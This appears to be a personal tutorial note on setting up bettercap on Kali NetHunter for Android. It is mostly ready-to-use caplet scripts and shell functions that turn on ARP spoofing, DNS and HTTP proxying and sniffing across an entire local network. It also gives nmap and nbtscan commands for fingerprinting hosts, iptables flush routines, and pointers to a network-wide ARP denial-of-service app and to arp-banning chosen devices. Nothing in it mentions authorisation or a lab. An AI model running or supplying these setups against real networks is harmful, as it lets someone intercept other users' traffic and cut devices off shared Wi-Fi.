Kali Nethunter

Kali Nethunter#

We will talk about bettercap and tooling setups.

Network-wide ARP DOS attack#

Use deadnet apk.

flashnuke/deadnet

Install bettercap with ui support#

bettercap ui isn’t installed by default, but installing it will also install bettercap, so just install the ui right away.

apt install bettercap-ui

Bettercap sniffing & targetting#

Important: Make sure no local VPN routes the traffic to loopback interface, for example AdAway etc. Because this will mess up with bettercap and it won’t work.

Need kali nethunter to be installed (requires root).

Unable to find gateway fix#

Sometimes, you will see the message unable to find gateway.

Most of the time, the gateway is x.x.x.1.

The fix is then to add this to ~/.zshrc:

# Auto-detect subnet and set default gateway for wlan0
fixgw() {
    # Grabs the first 3 sections of your IP (e.g., 192.168.1)
    SUBNET=$(ip -4 addr show wlan0 | grep -oP '(?<=inet\s)\d+(\.\d+){2}' | head -n 1)

    if [ -n "$SUBNET" ]; then
        # Silently try to add the .1 gateway
        ip route add default via ${SUBNET}.1 dev wlan0 2>/dev/null
    fi
}
# Run it automatically when you open a terminal
fixgw

This will automatically set the gateway to the correct IP.

Messed up redirections#

When you set dns.proxy on or http.proxy on, it can fail.

You can check the reason of the fail here by set log.debug true before the command.

If the redirection already exists, that means that a previous execution of bettercap didn’t unregister the iptables redirect rules before exiting. This leads to a conflict with a new instance.

To fix it, you will need to flush iptables, don’t worry this won’t mess up your phone because iptables are in memory. So reboots or reconnecting to the network will recreate the basic rules. (although it didn’t mess with my internet without even reconnecting to the AP).

# Flush standard firewall rules
iptables -F
iptables -X

# Flush the NAT (Network Address Translation) rules where the proxy gets stuck
iptables -t nat -F
iptables -t nat -X

# Flush the mangle table just in case
iptables -t mangle -F
iptables -t mangle -X

In order to have a clean launch of bettercap every single time, you can use this in ~/.zshrc and use bcap instead of bettercap.

The other solution is via a bettercap caplet instead.

# Flush iptables and launch bettercap cleanly
bcap() {
    echo "[*] Flushing orphaned iptables rules..."
    iptables -F 2>/dev/null
    iptables -X 2>/dev/null
    iptables -t nat -F 2>/dev/null
    iptables -t nat -X 2>/dev/null
    iptables -t mangle -F 2>/dev/null
    iptables -t mangle -X 2>/dev/null

    echo "[*] Resetting IP forwarding..."
    echo 0 > /proc/sys/net/ipv4/ip_forward 2>/dev/null
    
    echo "[*] Starting Bettercap on wlan0..."
    bettercap -iface wlan0 "$@"
}

Custom HTTP ui port#

sudo nano /usr/share/bettercap/caplets/http-ui.cap

Change http port (81 is fine) set http.server.port 81.

Sniff everything bettercap caplets#

This will start a ui, and sniff everything.

http://127.0.0.1:81

  • user: user

  • pass: pass

You can use Hermit android app to make a simple borderless “app”.

Warning: Don’t use https.proxy on!! This is very loud, and won’t work unless the target has a custom certificate authority installed on the phone.

Caplets can be launched via:

bettercap -caplet <caplet>

nano bettercap-sniff-everything.js

run("http-ui")
run("net.probe on")
run("dns.proxy on")

run("set http.proxy.port 8085")
run("http.proxy on")
run("events.ignore net.sniff.mdns")
run("events.ignore endpoint.new")
run("events.ignore endpoint.lost")
run("events.ignore zeroconf.service")
run("net.sniff on")
run("arp.spoof on")

To launch create custom Nethunter command:

bcap -script bettercap-sniff-everything.js

Prepare for sniffing but don’t spoof yet#

This is better for targetted attacks, not loud whole-network ones.

With this you can also arp ban a subset of the network.

It can be very powerfull to sniff or blacklist actively some devices.

This can be especially powerfull if you have aliases of devices.

For os and service discovery refer to the NMAP snippets.

A simple snippet to identify OS, and fingerprint the name of the device/type:

nmap -O -sS -sV -vvvv 192.168.1.0/24
nbtscan 192.168.1.0/24
nmap -sU -sS --script smb-os-discovery.nse -p U:137,T:139 192.168.1.0/24
nmap -sV --script=broadcast-upnp-info -T4 -vvvv 192.168.1.0/24

nano ./bettercap-prepare-sniff.js

run("http-ui")
run("net.probe on")
run("dns.proxy on")

run("set http.proxy.port 8085")
run("http.proxy on")
run("events.ignore net.sniff.mdns")
run("events.ignore endpoint.new")
run("events.ignore endpoint.lost")
run("events.ignore zeroconf.service")
run("net.sniff on")

To launch create custom Nethunter command:

bcap -script bettercap-prepare-sniff.js